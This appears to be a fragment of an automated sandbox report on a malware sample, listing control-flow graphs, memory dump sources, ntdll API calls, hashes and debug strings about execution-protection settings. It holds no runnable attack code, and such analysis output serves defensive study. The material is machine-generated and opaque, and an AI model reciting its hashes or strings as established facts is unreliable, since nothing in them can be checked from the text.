                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4290022130104403D540B15855186864019D7E1301F51D416E0404954CDB2588566236

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 158 34a2c30-34a2c3c LdrInitializeThunk
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000004.00000002.30462678996.0000000003430000.00000040.00001000.00020000.00000000.sdmp, Offset: 03430000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000004.00000002.30462678996.0000000003559000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000004.00000002.30462678996.000000000355D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_3430000_ROUTE.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                                                          • Opcode ID: bad0aecd6d30ad540c27656dad1de299f7809e9362bc453138effef9e42a9f75
                                                                                                                                                                                                                          • Instruction ID: 1ea59e205581ec68cf6d265b81ba5579e9f91232f77fd8eceef18fd8ce5def9c
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bad0aecd6d30ad540c27656dad1de299f7809e9362bc453138effef9e42a9f75
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3490022921304403D580B158550868A001987D1202F91D81AA0005958CCB2588696335

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 160 34a2cf0-34a2cfc LdrInitializeThunk
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000004.00000002.30462678996.0000000003430000.00000040.00001000.00020000.00000000.sdmp, Offset: 03430000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000004.00000002.30462678996.0000000003559000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000004.00000002.30462678996.000000000355D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_3430000_ROUTE.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                                                          • Opcode ID: 0d6e9d26c2011134bdacd152a1f6db8cdb563776075627051e3790b5ac1b4226
                                                                                                                                                                                                                          • Instruction ID: 3d9ad4bc001d76377343c6051ccf2947528d2855559049f30de5ab7aecb29b53
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0d6e9d26c2011134bdacd152a1f6db8cdb563776075627051e3790b5ac1b4226
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CE900221242085539945F1584504587401A97E0241791C417A1404D50CC7369856E635
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000004.00000002.30462678996.0000000003430000.00000040.00001000.00020000.00000000.sdmp, Offset: 03430000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000004.00000002.30462678996.0000000003559000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000004.00000002.30462678996.000000000355D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_3430000_ROUTE.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                                                          • Opcode ID: bab80c77c8ca59fbbd2b3cb1221011c64046468c553cb9c91559563dac83df80
                                                                                                                                                                                                                          • Instruction ID: 0a6406a65a2c774081b5eadc7527d658b0fdbfedaf8cd510cb5c99112b5347e2
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bab80c77c8ca59fbbd2b3cb1221011c64046468c553cb9c91559563dac83df80
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2C90023160514803D500A1584614786101987D0201F61C816A0414968DC7A5895175B6
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000004.00000002.30462678996.0000000003430000.00000040.00001000.00020000.00000000.sdmp, Offset: 03430000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000004.00000002.30462678996.0000000003559000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000004.00000002.30462678996.000000000355D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_3430000_ROUTE.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                                                          • Opcode ID: 5134ca199013252e6b54eb791d94e1d1f888488d85c33b58aa523c4a2780a442
                                                                                                                                                                                                                          • Instruction ID: 28e71999fff79ead888ffdacb995405bcdbcf371a4911d1ae42c18c878723b62
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5134ca199013252e6b54eb791d94e1d1f888488d85c33b58aa523c4a2780a442
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3390022124509503D550B15C45046964019A7E0201F51C426A0804994DC76588557235

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 135 92852d-92854a RtlDosPathNameToNtPathName_U 136 9284e3 135->136 137 92854c 135->137 138 92854d-92855f 136->138 139 9284e5-9284ea 136->139 137->138 140 928561-928567 138->140 141 9284eb-9284fa 138->141 139->141 142 928523-928528 140->142 143 928511-928522 141->143 144 9284fc-928506 141->144 142->135 143->142
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • RtlDosPathNameToNtPathName_U.NTDLL ref: 0092852D
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000004.00000002.30459507083.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_900000_ROUTE.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Path$NameName_
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3514427675-0
                                                                                                                                                                                                                          • Opcode ID: 7699c52f4941e5e7488644efed6622d08645ad924800ebe282e98c18fceabbbc
                                                                                                                                                                                                                          • Instruction ID: 25fb208de6a30f80a7a679e020626a520a3e792b79efa19245bcbbcfcd3bbe5c
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7699c52f4941e5e7488644efed6622d08645ad924800ebe282e98c18fceabbbc
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C0118E7234C6F28BC313EDB889826957F855E0230071D06F8C4E0DFAD3CA29D246C781

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 145 34a2b2a-34a2b2f 146 34a2b3f-34a2b46 LdrInitializeThunk 145->146 147 34a2b31-34a2b38 145->147
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000004.00000002.30462678996.0000000003430000.00000040.00001000.00020000.00000000.sdmp, Offset: 03430000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000004.00000002.30462678996.0000000003559000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000004.00000002.30462678996.000000000355D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_3430000_ROUTE.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                                                          • Opcode ID: c2533a39e129e12c762ff05468278a23e8ee167ee0f573ee83efca6d694290e0
                                                                                                                                                                                                                          • Instruction ID: 0a6516ae59f5eb344a7bcd2f51731b834de6aa9c33d6af41e809346e945e0d12
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c2533a39e129e12c762ff05468278a23e8ee167ee0f573ee83efca6d694290e0
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 43B09B719018C5C7DA11DB644708757795467D0701F15C457D1460A91E8778C091F179
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000004.00000002.30462599408.0000000003310000.00000040.00000800.00020000.00000000.sdmp, Offset: 03310000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_3310000_ROUTE.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 5e981132cc01d9c0d6a92408eaaeb3d46944567baf067f701bb7a90dbf7f6992
                                                                                                                                                                                                                          • Instruction ID: a44052359100c8a4d938a6fba47b92ef01ca3b9a11480964d791d2ed7f40b092
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5e981132cc01d9c0d6a92408eaaeb3d46944567baf067f701bb7a90dbf7f6992
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C841D37491CB0D4FD36CEF6894C1676F3E2FB89300F10052DD98AC7252EB74E8968685
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • ExecuteOptions, xrefs: 034D44AB
                                                                                                                                                                                                                          • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 034D4460
                                                                                                                                                                                                                          • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 034D454D
                                                                                                                                                                                                                          • Execute=1, xrefs: 034D451E
                                                                                                                                                                                                                          • CLIENT(ntdll): Processing section info %ws..., xrefs: 034D4592
                                                                                                                                                                                                                          • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 034D4507
                                                                                                                                                                                                                          • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 034D4530
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000004.00000002.30462678996.0000000003430000.00000040.00001000.00020000.00000000.sdmp, Offset: 03430000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000004.00000002.30462678996.0000000003559000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000004.00000002.30462678996.000000000355D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_3430000_ROUTE.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                                                                                                                          • API String ID: 0-484625025
                                                                                                                                                                                                                          • Opcode ID: b6085b1a3243c0f8f89c13ad7889b4f8b00dee2b7ab8fdc4e30b490d687a5c77
                                                                                                                                                                                                                          • Instruction ID: b2b403c9cc00c695b4dac8961fc60882d84470b6ad6ba45258e65be4b16a4039
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b6085b1a3243c0f8f89c13ad7889b4f8b00dee2b7ab8fdc4e30b490d687a5c77
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 34510831A003197EFF50EA95DC99FAE7BA8AF08310F0405ABD515AF291EB709E45CB5C
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000004.00000002.30462678996.0000000003430000.00000040.00001000.00020000.00000000.sdmp, Offset: 03430000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000004.00000002.30462678996.0000000003559000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000004.00000002.30462678996.000000000355D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_3430000_ROUTE.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: $$@
                                                                                                                                                                                                                          • API String ID: 0-1194432280
                                                                                                                                                                                                                          • Opcode ID: 07e48470ae019495df2bf96f51db2427469228b798baf091a6626387754dbe0b
                                                                                                                                                                                                                          • Instruction ID: 6fc1db166f542353834c6eb631a43cf934e7a9953db8f0640f5b2b0ab5cc7980
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 07e48470ae019495df2bf96f51db2427469228b798baf091a6626387754dbe0b
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A0814875D002699BDB31DF54CC44BEEB6B8AB08700F0445EBE919BB250D7B09E85CFA9